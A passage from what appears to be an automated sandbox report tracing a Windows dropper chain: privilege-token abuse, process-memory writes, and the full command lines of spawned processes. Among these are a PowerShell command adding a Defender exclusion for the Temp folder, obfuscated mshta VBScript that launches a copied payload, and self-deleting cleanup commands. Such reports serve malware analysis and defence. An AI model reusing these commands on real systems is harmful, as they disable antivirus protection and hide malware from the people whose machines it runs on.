N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19e6a852f849bb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19e6a852f849bb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19e6a852f849bb2.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19e6a852f849bb2.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-H0SA9.tmp\setup_2.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-H0SA9.tmp\setup_2.tmp N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19c6762a08beae.exe N/A

Suspicious behavior: SetClipboardViewer

Description Indicator Process Target
N/A N/A C:\ProgramData\7858017.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\setup_2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat191649b47c9e2.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\2567193.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\ProgramData\4182401.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\ProgramData\129133.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\4643831.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\129133.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\4643831.exe N/A
Token: SeDebugPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-H0SA9.tmp\setup_2.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-M97F2.tmp\ultramediaburner.tmp N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1ycragm0.zlv\installer.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2028 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2028 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2028 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2028 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2028 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2028 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2028 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1576 wrote to memory of 324 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe
PID 1576 wrote to memory of 324 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe
PID 1576 wrote to memory of 324 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe
PID 1576 wrote to memory of 324 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe
PID 1576 wrote to memory of 324 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe
PID 1576 wrote to memory of 324 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe
PID 1576 wrote to memory of 324 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe
PID 324 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 324 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe

"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat196ac06a9e6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1946eb84e6.exe

C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19e4750dd01.exe

Sat19e4750dd01.exe /mixone

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19ba05e89ea6d406.exe

Sat19ba05e89ea6d406.exe

C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19c6762a08beae.exe

Sat19c6762a08beae.exe

C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19f84b58b3d7.exe

Sat19f84b58b3d7.exe

C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19e6a852f849bb2.exe

Sat19e6a852f849bb2.exe

C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe

Sat196ac06a9e6.exe

C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat199ba8a4637dcb034.exe

Sat199ba8a4637dcb034.exe

C:\Users\Admin\AppData\Local\Temp\is-HVCO3.tmp\Sat19ba05e89ea6d406.tmp

"C:\Users\Admin\AppData\Local\Temp\is-HVCO3.tmp\Sat19ba05e89ea6d406.tmp" /SL5="$6013A,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19ba05e89ea6d406.exe"

C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat191649b47c9e2.exe

Sat191649b47c9e2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19c6762a08beae.exe

C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat1946eb84e6.exe

Sat1946eb84e6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19e6a852f849bb2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19ba05e89ea6d406.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19f84b58b3d7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19e4750dd01.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat199ba8a4637dcb034.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat191649b47c9e2.exe

C:\ProgramData\2567193.exe

"C:\ProgramData\2567193.exe"

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\ProgramData\305459.exe

"C:\ProgramData\305459.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Users\Admin\AppData\Local\Temp\is-DU278.tmp\46807GHF____.exe

"C:\Users\Admin\AppData\Local\Temp\is-DU278.tmp\46807GHF____.exe" /S /UID=burnerch2

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe

"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"

C:\Users\Admin\AppData\Local\Temp\2.exe

"C:\Users\Admin\AppData\Local\Temp\2.exe"

C:\ProgramData\129133.exe

"C:\ProgramData\129133.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe

"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"

C:\Users\Admin\AppData\Local\Temp\udptest.exe

"C:\Users\Admin\AppData\Local\Temp\udptest.exe"

C:\Users\Admin\AppData\Local\Temp\setup_2.exe

"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"

C:\Users\Admin\AppData\Local\Temp\3002.exe

"C:\Users\Admin\AppData\Local\Temp\3002.exe"

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"

C:\Users\Admin\AppData\Local\Temp\is-95LFV.tmp\setup_2.tmp

"C:\Users\Admin\AppData\Local\Temp\is-95LFV.tmp\setup_2.tmp" /SL5="$20184,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"

C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe

"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"

C:\Users\Admin\AppData\Local\Temp\setup_2.exe

"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT

C:\ProgramData\7027501.exe

"C:\ProgramData\7027501.exe"

C:\Users\Admin\AppData\Local\Temp\3002.exe

"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a

C:\ProgramData\4182401.exe

"C:\ProgramData\4182401.exe"

C:\Users\Admin\AppData\Local\Temp\is-H0SA9.tmp\setup_2.tmp

"C:\Users\Admin\AppData\Local\Temp\is-H0SA9.tmp\setup_2.tmp" /SL5="$301C2,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCrIPt: close ( crEateobJeCt ("wsCRIpT.sHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\7027501.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If """"== """" for %l In ( ""C:\ProgramData\7027501.exe"") do taskkill -Im ""%~nxl"" /F " , 0 , TRuE) )

C:\ProgramData\6616075.exe

"C:\ProgramData\6616075.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit

C:\ProgramData\7858017.exe

"C:\ProgramData\7858017.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "Sat19e4750dd01.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19e4750dd01.exe" & exit

C:\ProgramData\4643831.exe

"C:\ProgramData\4643831.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "Sat19e4750dd01.exe" /f

C:\Users\Admin\AppData\Local\Temp\is-4D1VC.tmp\postback.exe

"C:\Users\Admin\AppData\Local\Temp\is-4D1VC.tmp\postback.exe" ss1

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im Sat19e6a852f849bb2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19e6a852f849bb2.exe" & del C:\ProgramData\*.dll & exit

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\ProgramData\1127203.exe

"C:\ProgramData\1127203.exe"

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\taskkill.exe

taskkill /im Sat19e6a852f849bb2.exe /f

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCrIPt: close ( crEateobJeCt ("wsCRIpT.sHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\1127203.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If """"== """" for %l In ( ""C:\ProgramData\1127203.exe"") do taskkill -Im ""%~nxl"" /F " , 0 , TRuE) )

C:\ProgramData\6947003.exe

"C:\ProgramData\6947003.exe"

C:\ProgramData\129133.exe

"C:\ProgramData\129133.exe"

C:\ProgramData\4643831.exe

"C:\ProgramData\4643831.exe"

C:\ProgramData\4643831.exe

"C:\ProgramData\4643831.exe"

C:\Program Files\7-Zip\CGHDWDWKCK\ultramediaburner.exe

"C:\Program Files\7-Zip\CGHDWDWKCK\ultramediaburner.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\is-M97F2.tmp\ultramediaburner.tmp

"C:\Users\Admin\AppData\Local\Temp\is-M97F2.tmp\ultramediaburner.tmp" /SL5="$40172,281924,62464,C:\Program Files\7-Zip\CGHDWDWKCK\ultramediaburner.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\36-beef0-53e-096b8-92a5ea06293eb\Tizhisharusi.exe

"C:\Users\Admin\AppData\Local\Temp\36-beef0-53e-096b8-92a5ea06293eb\Tizhisharusi.exe"

